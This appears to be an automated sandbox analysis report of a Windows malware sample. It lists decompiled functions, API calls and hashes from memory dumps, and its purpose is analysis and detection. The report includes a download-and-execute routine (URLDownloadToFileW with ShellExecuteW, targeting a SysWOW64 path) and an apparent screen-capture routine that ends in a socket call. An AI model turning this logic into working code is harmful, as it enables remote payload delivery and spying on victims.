						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x46a00d
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x105d2ea6
0x105d2eaa
0x105d2eb1
0x105d2eb5
0x105d2ec3
0x105d2ed9
0x105d2edd
0x105d2f06
0x105d2f08
0x105d2f0c
0x105d2f0f
0x105d2f0f
0x105d2f15
0x105d2f17
0x00000000
0x105d2f18
0x105d2edf
0x105d2ee8
0x105d2ef7
0x105d2eea
0x105d2eed
0x105d2ef3
0x105d2ef3
0x105d2efb
0x00000000
0x105d2efd
0x105d2f00
0x105d2f02
0x00000000
0x105d2f02
0x105d2efb
0x105d2eb7
0x105d2ebc
0x00000000

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,105D2E48,?,00000000,00000000,00000000,?,105D3174,00000006,00454340), ref: 105D2ED3
GetLastError.KERNEL32(?,105D2E48,?,00000000,00000000,00000000,?,105D3174,00000006,00454340,00459068,00459070,00000000,00000364,?,105D2C22), ref: 105D2EDF
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,105D2E48,?,00000000,00000000,00000000,?,105D3174,00000006,00454340,00459068,00459070,00000000), ref: 105D2EED

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 5876dbb1db08068e45b27a8b40375508f8d8c7a9e5a20dc41c15f5dc73dd1d81
Instruction ID: a13bb1a72b4dc3d56ca80d0b245e06be387fcd1e862af31acbddfd279ab9fdf6
Opcode Fuzzy Hash: 5876dbb1db08068e45b27a8b40375508f8d8c7a9e5a20dc41c15f5dc73dd1d81
Instruction Fuzzy Hash: 1B0171326067239BC7114B7DAC46A567FA8EB15AF6B110A21F905D7241DB20D9118BE4

Uniqueness

Uniqueness Score: -1.00%

Function 00442033, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0046C518,00000000,00000000,?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue), ref: 00442065
GetLastError.KERNEL32(?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue,00459068,00459070,00000000,00000364,?,00441DB4), ref: 00442071
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue,00459068,00459070,00000000), ref: 0044207F

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 5876dbb1db08068e45b27a8b40375508f8d8c7a9e5a20dc41c15f5dc73dd1d81
Instruction ID: 1f93bee859a7bc905b4f209078c92e3314857c5c8a056cdaea3c14562744cb27
Opcode Fuzzy Hash: 5876dbb1db08068e45b27a8b40375508f8d8c7a9e5a20dc41c15f5dc73dd1d81
Instruction Fuzzy Hash: EC01D432601723ABD7314E789D44A6777D8AF55BA2BA00632FB06D3241DB64D801C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 004179DC, Relevance: 6.1, APIs: 4, Instructions: 52fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,004136FE), ref: 004179F9
GetFileSize.KERNEL32(00000000,00000000,00000000,?,004136FE), ref: 00417A0D
ReadFile.KERNEL32(00000000,00000000,00000000,004136FE,00000000,00000000,00000000,?,004136FE), ref: 00417A32
CloseHandle.KERNEL32(00000000,004136FE), ref: 00417A40

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 42e664b68ac7724ba780c5c00098682f8beb43ab86657588be60b934e4d9d7db
Instruction ID: 7ac9442b92b71a3b95e557c57f242bac25566de69d818a97a3fadf0226cee174
Opcode Fuzzy Hash: 42e664b68ac7724ba780c5c00098682f8beb43ab86657588be60b934e4d9d7db
Instruction Fuzzy Hash: 1801D670541218BFE7105F61AC89EFF777CDB45396F1001AAF805A3281D6748F019674

Uniqueness

Uniqueness Score: -1.00%

Function 10595F89, Relevance: 6.0, APIs: 4, Instructions: 38
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E10595F89(void* __ecx, void* __edi, char _a4) {
				void* _t17;
				void* _t22;
				void* _t23;

				_t22 = __ecx;
				if( *((char*)(__ecx + 0x50)) == 0) {
					return 0;
				}
				if(_a4 == 0) {
					_t24 = _t23 - 0x18;
					E10592EF2(_t17, _t23 - 0x18, 0x45f650);
					E10592EF2(_t17, _t24 - 0x18, 0x45f670);
					E105A7AEE(_t17, __edi);
				}
				 *(_t22 + 0x58) = CreateEventA(0, 0, 0, 0);
				SetEvent( *(_t22 + 0x54));
				WaitForSingleObject( *(_t22 + 0x58), 0xffffffff);
				CloseHandle( *(_t22 + 0x58));
				return 1;
			}

0x10595f8d
0x10595f93
0x00000000
0x10595ff1
0x10595f99
0x10595f9b
0x10595fa5
0x10595fb4
0x10595fb9
0x10595fbe
0x10595fd0
0x10595fd3
0x10595fde
0x10595fe7
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,0046C138,?,10595B17,00000001,0046C138,10595AC4,00000000,00000000,00000000), ref: 10595FC7
SetEvent.KERNEL32(?,?,10595B17,00000001,0046C138,10595AC4,00000000,00000000,00000000), ref: 10595FD3
WaitForSingleObject.KERNEL32(?,000000FF,?,10595B17,00000001,0046C138,10595AC4,00000000,00000000,00000000), ref: 10595FDE
CloseHandle.KERNEL32(?,?,10595B17,00000001,0046C138,10595AC4,00000000,00000000,00000000), ref: 10595FE7

Part of subcall function 105A7AEE: GetLocalTime.KERNEL32(00000000), ref: 105A7B08

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID:
API String ID: 2993684571-0
Opcode ID: 14243e36c7ce333b7c6a390551ac247db8d93023064db34f7c36e6f1ee58e299
Instruction ID: dfe5be14bc162600193827d61b5849e397aa6278b3027342138a9cae8f40158b
Opcode Fuzzy Hash: 14243e36c7ce333b7c6a390551ac247db8d93023064db34f7c36e6f1ee58e299
Instruction Fuzzy Hash: 5AF096725047507FDB002F74DC0EA7A7F9CEB023A6F500569FC42C29A1DBA1D9A497A6

Uniqueness

Uniqueness Score: -1.00%

Function 00417678, Relevance: 6.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041768D
GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 004176AF
CloseHandle.KERNEL32(00000000), ref: 004176BA
CloseHandle.KERNEL32(00000000), ref: 004176C2

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$FileModuleNameOpenProcess
String ID:
API String ID: 3706008839-0
Opcode ID: 26b55f5a258af6edc2e09f8168abb4a95287f2a40d9827df7da255adfb7933c9
Instruction ID: f8a04bcb30d388e69ca110f6c0d2bfbdbb8b62fcd9983a5c8f5887249ce98a8e
Opcode Fuzzy Hash: 26b55f5a258af6edc2e09f8168abb4a95287f2a40d9827df7da255adfb7933c9
Instruction Fuzzy Hash: 44F0E9312447156BD6205A585C09FAB367C8784B93F100177F908D5292EEA4D94246AE

Uniqueness

Uniqueness Score: -1.00%

Function 00431D01, Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00431D01
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00431D06
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00431D0B

Part of subcall function 00435195: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004351A6

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00431D20

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 189a8e90e542afe2bfd3c914dbb3a980279d05a3d78919d3eec1123e7ddccfc2
Instruction ID: 27214f9afc0f91924c16f590125f67372317177f634fefb71269c805fcfa3a97
Opcode Fuzzy Hash: 189a8e90e542afe2bfd3c914dbb3a980279d05a3d78919d3eec1123e7ddccfc2
Instruction Fuzzy Hash: 53C04C08844581101CA07A7352033FE13545CAF38CFB030DFA8711B6279E0D240B557F

Uniqueness

Uniqueness Score: -1.00%

Function 0041459C, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 249COMMON

Download Yara Rule

APIs

Part of subcall function 00414906: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00414921
Part of subcall function 00414906: CreateCompatibleDC.GDI32(00000000), ref: 0041492D

SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00414646
SHCreateMemStream.SHLWAPI(00000000), ref: 0041469C

Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11

Strings

image/jpeg, xrefs: 00414660

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Create$Stream$Compatibleclosesocket
String ID: image/jpeg
API String ID: 3038386933-3785015651
Opcode ID: 3157928d94f895fa7c0d31915b799c90f63e5896104200d7a1b167f31e524ab8
Instruction ID: 76b108af669c3063bc8327b28f0eeeb389dcf0988f89de8eeeeaadbda1c1d6eb
Opcode Fuzzy Hash: 3157928d94f895fa7c0d31915b799c90f63e5896104200d7a1b167f31e524ab8
Instruction Fuzzy Hash: F8816D716083419BC324FB25C985AEFB3A4AFC5318F00493FB5969B1D1EF785945CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 10596AF9, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 226
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E10596AF9(char* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v28;
				char _v44;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v84;
				void* _v104;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t33;
				void* _t50;
				signed char _t54;
				intOrPtr* _t57;
				void* _t59;
				void* _t71;
				void* _t73;
				void* _t78;
				intOrPtr* _t80;
				void* _t82;
				void* _t84;
				void* _t85;
				void* _t87;
				void* _t89;
				void* _t107;
				void* _t121;
				void* _t145;
				void* _t149;
				signed int _t156;
				void* _t159;
				void* _t160;
				void* _t161;
				void* _t163;
				void* _t167;
				void* _t168;

				_t168 = __eflags;
				_t141 = __edx;
				_t33 = E10592E03( &_a8);
				_push(0xffffffff);
				_t89 = 4;
				_push(_t89);
				_push( &_v28);
				E10595114( &_a8);
				_t159 = (_t156 & 0xfffffff8) - 0x2c;
				E10592F5A(_t89, _t159, __edx, _t168, 0x46c238);
				_t160 = _t159 - 0x18;
				E10592F5A(_t89, _t160, __edx, _t168,  &_v44);
				E105A82E6( &_v84, _t141);
				_t161 = _t160 + 0x30;
				_t149 =  *_t33 - _t89;
				if(_t149 == 0) {
					_t145 = 0;
					E10592CB7( &_v64, _t141, __eflags, 0);
					__eflags = E105968DD(0x45f6dc);
					if(__eflags == 0) {
						E10592CB7( &_v68, 0x45f6dc, __eflags, 0);
						_t141 = 0x45f6fc;
						__eflags = E105968DD(0x45f6fc);
						if(__eflags == 0) {
							L23:
							E10592CE2( &_v64, _t141);
							E10592E35();
							E10592E35();
							return 0;
						}
						_v68 = 0;
						_t50 = E10592E03(E10592CB7( &_v64, 0x45f6fc, __eflags, _t89));
						_t141 =  &_v76;
						__eflags = E105A7F7F(_t50,  &_v76,  &_v68);
						if(__eflags == 0) {
							_t107 = _t161 - 0x18;
							_push(0x45f6e0);
							L22:
							E10592EF2(_t89, _t107);
							_push(0xb3);
							E10595912(_t89, _a4, _t141, __eflags);
							goto L23;
						}
						_t141 = _v72;
						_t54 = E105A5199(0x46bb08);
						L105CA35F(_v72);
						_t163 = _t161 - 0x18;
						__eflags = (_t54 & 0x000000ff) - 1;
						L9:
						_t107 = _t163;
						if(__eflags != 0) {
							_push(0x45f6f0);
						} else {
							_push(0x45f6f4);
						}
						goto L22;
					}
					_t57 = E10592E03(E10592CB7( &_v68, 0x45f6dc, __eflags, 2));
					_t59 = E10592E03(E10592CB7( &_v68, 0x45f6dc, __eflags, 3));
					_t141 =  *_t57;
					E105A8EC9( &_v60,  *_t57, _t59);
					__eflags =  *0x453468(0, E10592E03(E10592CB7( &_v72,  *_t57, __eflags, _t89)), E10592D59( &_v60), 0, 0);
					if(__eflags == 0) {
						L4:
						if( *((char*)(E10592E03(E10592CB7( &_v84, _t141, _t172, 1)))) == 0) {
							_t121 = _t161 - 0x18;
							_push(0x45f6f8);
						} else {
							_t71 = ShellExecuteW(_t145, 0x45f6e4, E10592D59( &_v72), _t145, _t145, 1);
							_t121 = _t161 - 0x18;
							_t174 = _t71 - 0x20;
							if(_t71 > 0x20) {
								_push(0x45f6f4);
							} else {
								_push(0x45f6f0);
							}
						}
						L17:
						E10592EF2(_t89, _t121);
						_push(0xb3);
						E10595912(_t89, _a4, _t141, _t174);
						E10592D5E();
						goto L23;
					}
					L14:
					_t121 = _t161 - 0x18;
					_push(0x45f6e0);
					goto L17;
				}
				_t170 = _t149 != 1;
				if(_t149 != 1) {
					goto L23;
				}
				_t145 = 0;
				E10592CB7( &_v64, _t141, _t170, 0);
				_t73 = E105968DD(0x45f6dc);
				_t171 = _t73;
				if(_t73 == 0) {
					E10592CB7( &_v68, 0x45f6dc, __eflags, 0);
					_t141 = 0x45f6fc;
					__eflags = E105968DD(0x45f6fc);
					if(__eflags == 0) {
						goto L23;
					} else {
						_t141 = E10592E03(E10592CB7( &_v64, 0x45f6fc, __eflags, _t89));
						_t78 = E105A5199(0x46bb08);
						_t163 = _t161 - 0x18;
						__eflags = _t78 - 1;
						goto L9;
					}
				}
				_t80 = E10592E03(E10592CB7( &_v68, 0x45f6dc, _t171, 2));
				_t82 = E10592E03(E10592CB7( &_v68, 0x45f6dc, _t171, 3));
				_t141 =  *_t80;
				E105A8EC9( &_v60,  *_t80, _t82);
				_t84 = E10592D59( &_v60);
				_t85 = E10592CB7( &_v72,  *_t80, _t171, _t89);
				_t167 = _t161 - 0x18;
				E10592F5A(_t89, _t167, _t141, _t171, _t85);
				_t87 = E105A88BC(_t84);
				_t161 = _t167 + 0x18;
				_t172 = _t87 - 1;
				if(_t87 != 1) {
					goto L14;
				}
				goto L4;
			}

0x10596af9
0x10596af9
0x10596b08
0x10596b0d
0x10596b11
0x10596b17
0x10596b1c
0x10596b1d
0x10596b22
0x10596b2c
0x10596b31
0x10596b3b
0x10596b44
0x10596b49
0x10596b4c
0x10596b4e
0x10596c83
0x10596c8a
0x10596c9f
0x10596ca1
0x10596d41
0x10596d46
0x10596d52
0x10596d54
0x10596dc2
0x10596dc6
0x10596dcf
0x10596dd7
0x10596de4
0x10596de4
0x10596d5a
0x10596d6b
0x10596d70
0x10596d7c
0x10596d7e
0x10596da9
0x10596dab
0x10596db0
0x10596db0
0x10596db8
0x10596dbd
0x00000000
0x10596dbd
0x10596d80
0x10596d89
0x10596d95
0x10596d9b
0x10596d9e
0x10596c6b
0x10596c6b
0x10596c6d
0x10596c79
0x10596c6f
0x10596c6f
0x10596c6f
0x00000000
0x10596c6d
0x10596cb0
0x10596cc4
0x10596cc9
0x10596cd0
0x10596cfb
0x10596cfd
0x10596be2
0x10596bf7
0x10596d19
0x10596d1b
0x10596bfd
0x10596c11
0x10596c1a
0x10596c1c
0x10596c1f
0x10596d0f
0x10596c25
0x10596c25
0x10596c25
0x10596c1f
0x10596d20
0x10596d20
0x10596d28
0x10596d2d
0x10596d36
0x00000000
0x10596d36
0x10596d03
0x10596d06
0x10596d08
0x00000000
0x10596d08
0x10596b54
0x10596b57
0x00000000
0x00000000
0x10596b5d
0x10596b64
0x10596b70
0x10596b79
0x10596b7b
0x10596c30
0x10596c35
0x10596c41
0x10596c43
0x00000000
0x10596c49
0x10596c5a
0x10596c61
0x10596c66
0x10596c69
0x00000000
0x10596c69
0x10596c43
0x10596b8a
0x10596b9e
0x10596ba3
0x10596baa
0x10596bb4
0x10596bc0
0x10596bc5
0x10596bcb
0x10596bd2
0x10596bd7
0x10596bda
0x10596bdc
0x00000000
0x00000000
0x00000000

APIs

ShellExecuteW.SHELL32(00000000,0045F6E4,00000000,00000000,00000000,00000001), ref: 10596C11
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 10596CF5

Strings

C:\Windows\SysWOW64\DpiScaling.exe, xrefs: 10596C5C, 10596D84

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: C:\Windows\SysWOW64\DpiScaling.exe
API String ID: 2825088817-2099798370
Opcode ID: 453a47a43b9386e89b5fad37c1906368be786dd2ced269cf5789ff799b2fc22a
Instruction ID: 308bede8af26b3ddf02af1816fe3853dbbc29537abbe5d7df23d39214263e9b2
Opcode Fuzzy Hash: 453a47a43b9386e89b5fad37c1906368be786dd2ced269cf5789ff799b2fc22a
Instruction Fuzzy Hash: BB61A97AA0430067CA04EB74886BE7E3F59DBD5690F50092DF855971D5EE24AE0EC3E3

Uniqueness

Uniqueness Score: -1.00%

Function 0043FFED, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0044007D

Strings

pow, xrefs: 00440055, 00440072

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 470747d616ef13e46d520b9d6506e9ce1466c58b55dc60c101e84deed0b6941c
Instruction ID: babdc6cb86f69e92a49f67b65813cd9987bd5c6d342bfcb4e84cdf9adaacb59d
Opcode Fuzzy Hash: 470747d616ef13e46d520b9d6506e9ce1466c58b55dc60c101e84deed0b6941c
Instruction Fuzzy Hash: E9517CA1A0A20196F7517B14E9C137B2B90DB50701F284D7FF585423E9EB3D8CA59A4F

Uniqueness

Uniqueness Score: -1.00%

Function 00447399, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00446F6C: GetOEMCP.KERNEL32(00000000,?,?,004471F5,?), ref: 00446F97

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044723A,?,00000000), ref: 0044740D
GetCPInfo.KERNEL32(00000000,:rD,?,?,?,0044723A,?,00000000), ref: 00447420

Strings

:rD, xrefs: 0044741B, 0044741E

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CodeInfoPageValid
String ID: :rD
API String ID: 546120528-3120900009
Opcode ID: e7dd486a7158d532bde09d9e7db95788a91d24dc14596c43e70085922fabfaec
Instruction ID: 614f5d5ef064064d7ec38ea7b35d3f5f756231f868e2d753d05d5f6cbb9767d4
Opcode Fuzzy Hash: e7dd486a7158d532bde09d9e7db95788a91d24dc14596c43e70085922fabfaec
Instruction Fuzzy Hash: 65513370A086059EFB20CF35C8816BBBFA5EF41304F14406FD0868B251E73D9947CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0043EE70, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0043EF58
__freea.LIBCMT ref: 0043EFDE

Strings

:nA, xrefs: 0043EE72

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: __alloca_probe_16__freea
String ID: :nA
API String ID: 1635606685-739806843
Opcode ID: cd9779f19d5164756a7b6c9dd4ed2ebcf1146dd2ace0f223ff1ba358c0ba93f0
Instruction ID: b2704c7f0d005af92b138ccac846c72b2bc5cf82682ae8b9dcaf7a2bd2d3a61c
Opcode Fuzzy Hash: cd9779f19d5164756a7b6c9dd4ed2ebcf1146dd2ace0f223ff1ba358c0ba93f0
Instruction Fuzzy Hash: 2E410671A01112FBDB20AF66CC42A6F77A0DF59724F15552BF804DB2C0EB7CD941879A

Uniqueness

Uniqueness Score: -1.00%

Function 105C0805, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E105C0805(intOrPtr __edx, void* __eflags) {
				char _v16;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _t56;
				signed int _t58;
				signed int _t62;
				intOrPtr _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr* _t75;
				intOrPtr _t82;
				intOrPtr _t87;
				intOrPtr* _t89;
				signed int _t90;

				_t87 = __edx;
				E105C07D0( &_v16);
				E105C2EC8( &_v16, 0x467cd4);
				asm("int3");
				 *0x46ad0c =  *0x46ad0c & 0x00000000;
				 *0x46a010 =  *0x46a010 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v36 = _v36 & 0x00000000;
				 *0x46a010 =  *0x46a010 | 0x00000002;
				 *0x46ad0c = 1;
				_t89 =  &_v60;
				_push(1);
				asm("cpuid");
				_pop(_t72);
				 *_t89 = 0;
				 *((intOrPtr*)(_t89 + 4)) = 1;
				 *((intOrPtr*)(_t89 + 8)) = 0;
				 *((intOrPtr*)(_t89 + 0xc)) = _t87;
				_v28 = _v60;
				_t56 = 1;
				_t82 = 0;
				_push(1);
				asm("cpuid");
				_pop(_t73);
				 *_t89 = _t56;
				 *((intOrPtr*)(_t89 + 4)) = _t72;
				 *((intOrPtr*)(_t89 + 8)) = _t82;
				 *((intOrPtr*)(_t89 + 0xc)) = _t87;
				if((_v48 ^ 0x49656e69 | _v52 ^ 0x6c65746e | _v56 ^ 0x756e6547) != 0) {
					L9:
					_t90 =  *0x46ad10;
					L10:
					_v44 = _v48;
					_t58 = _v52;
					_v24 = _t58;
					_v40 = _t58;
					if(_v28 >= 7) {
						_t64 = 7;
						_push(_t73);
						asm("cpuid");
						_t75 =  &_v60;
						 *_t75 = _t64;
						 *((intOrPtr*)(_t75 + 4)) = _t73;
						 *((intOrPtr*)(_t75 + 8)) = 0;
						 *((intOrPtr*)(_t75 + 0xc)) = _t87;
						_t65 = _v56;
						_v36 = _t65;
						_t58 = _v24;
						if((_t65 & 0x00000200) != 0) {
							 *0x46ad10 = _t90 | 0x00000002;
						}
					}
					if((_t58 & 0x00100000) != 0) {
						 *0x46a010 =  *0x46a010 | 0x00000004;
						 *0x46ad0c = 2;
						if((_t58 & 0x08000000) != 0 && (_t58 & 0x10000000) != 0) {
							asm("xgetbv");
							_v32 = _t58;
							_v28 = _t87;
							if((_v32 & 0x00000006) == 6 && 0 == 0) {
								_t62 =  *0x46a010 | 0x00000008;
								 *0x46ad0c = 3;
								 *0x46a010 = _t62;
								if((_v36 & 0x00000020) != 0) {
									 *0x46ad0c = 5;
									 *0x46a010 = _t62 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t67 = _v60 & 0x0fff3ff0;
				if(_t67 == 0x106c0 || _t67 == 0x20660 || _t67 == 0x20670 || _t67 == 0x30650 || _t67 == 0x30660 || _t67 == 0x30670) {
					_t90 =  *0x46ad10 | 0x00000001;
					 *0x46ad10 = _t90;
					goto L10;
				} else {
					goto L9;
				}
			}

0x105c0805
0x105c080e
0x105c081c
0x105c0821
0x105c0825
0x105c0833
0x105c0842
0x105c09b5
0x105c09bb
0x105c09bb
0x105c0848
0x105c084e
0x105c0859
0x105c085f
0x105c0862
0x105c0863
0x105c0867
0x105c0868
0x105c086a
0x105c086d
0x105c0870
0x105c0879
0x105c0898
0x105c089b
0x105c089c
0x105c089d
0x105c08a1
0x105c08a2
0x105c08a4
0x105c08a7
0x105c08aa
0x105c08ad
0x105c08f2
0x105c08f2
0x105c08f8
0x105c08ff
0x105c0902
0x105c0905
0x105c0908
0x105c090b
0x105c090f
0x105c0912
0x105c0913
0x105c0918
0x105c091b
0x105c091d
0x105c0920
0x105c0923
0x105c0926
0x105c092e
0x105c0931
0x105c0934
0x105c0939
0x105c0939
0x105c0934
0x105c0946
0x105c0948
0x105c094f
0x105c095e
0x105c0969
0x105c096c
0x105c096f
0x105c0980
0x105c098b
0x105c098e
0x105c099c
0x105c09a1
0x105c09a6
0x105c09b0
0x105c09b0
0x105c09a1
0x105c0980
0x105c095e
0x00000000
0x105c0946
0x105c08b2
0x105c08bc
0x105c08e7
0x105c08ea
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 105C081C

Part of subcall function 105C2EC8: RaiseException.KERNEL32(?,?,?,105C0804,?,?,?,?,?,?,?,?,105C0804,?,00467C9C), ref: 105C2F27

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 105C083B

Strings

, xrefs: 105C0998

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: ExceptionException@8FeaturePresentProcessorRaiseThrow
String ID:
API String ID: 3513446524-3916222277
Opcode ID: a94f6f5834c9504162b7eaa04ed3e0543e0de1ca1c047e1d4971b6c159cbcaa3
Instruction ID: a3129a7cacb49e90969c228ff215194fd4efadeeb162f1c50629d1fabc319833
Opcode Fuzzy Hash: a94f6f5834c9504162b7eaa04ed3e0543e0de1ca1c047e1d4971b6c159cbcaa3
Instruction Fuzzy Hash: B151BE71D007099BEB14CFA5E98579EBFF8FB09350F10852AE415E7290E3B4A920CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00447044, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00447069

Strings

vuD, xrefs: 0044705B
, xrefs: 004470AE

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Info
String ID: $vuD
API String ID: 1807457897-1530330280
Opcode ID: 3f1def9f96a58cc15d1bbc526656efa8d46c329ab04edfec503587d68abf9c7b
Instruction ID: 92fcf1547ebdf66eb0b87621d9a8ff62090b57e6ee7fe94dbbcc2872a12e2c7f
Opcode Fuzzy Hash: 3f1def9f96a58cc15d1bbc526656efa8d46c329ab04edfec503587d68abf9c7b
Instruction Fuzzy Hash: 9641F9705082489FEF258E64CC84BF7BBB9DB55308F2404EEE58A87242D3399E46DF65

Uniqueness

Uniqueness Score: -1.00%

Function 10595E1B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112
timeCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E10595E1B(void* __edi, intOrPtr _a4) {
				struct _SYSTEMTIME _v24;
				char _v48;
				char _v72;
				void* __ebx;
				intOrPtr _t85;
				void* _t86;

				_t84 = __edi;
				if( *0x46c7d0 == 0) {
					__eflags = 0;
					return 0;
				}
				_t85 = _a4;
				if( *0x46bb03 == 0) {
					L7:
					 *0x46c7e0 =  *0x46c7e0 & 0x00000000;
					 *0x46c7e5 = 1;
					 *0x46c7dc = _t85;
					return 1;
				}
				_t91 =  *0x46c7e4;
				if( *0x46c7e4 != 0) {
					GetLocalTime( &_v24);
					_push(_v24.wMilliseconds & 0x0000ffff);
					_push(_v24.wSecond & 0x0000ffff);
					_push(_v24.wMinute & 0x0000ffff);
					E1059569C(_t91, E10592E03(E105961B1(0x45f5ec,  &_v48, E10592EF2(0x45f5ec,  &_v72, 0x45f5ec), __edi, _t91, 0x45f5cc)), _v24.wHour & 0x0000ffff);
					E10592E35();
					E10592E35();
					_push(_t85);
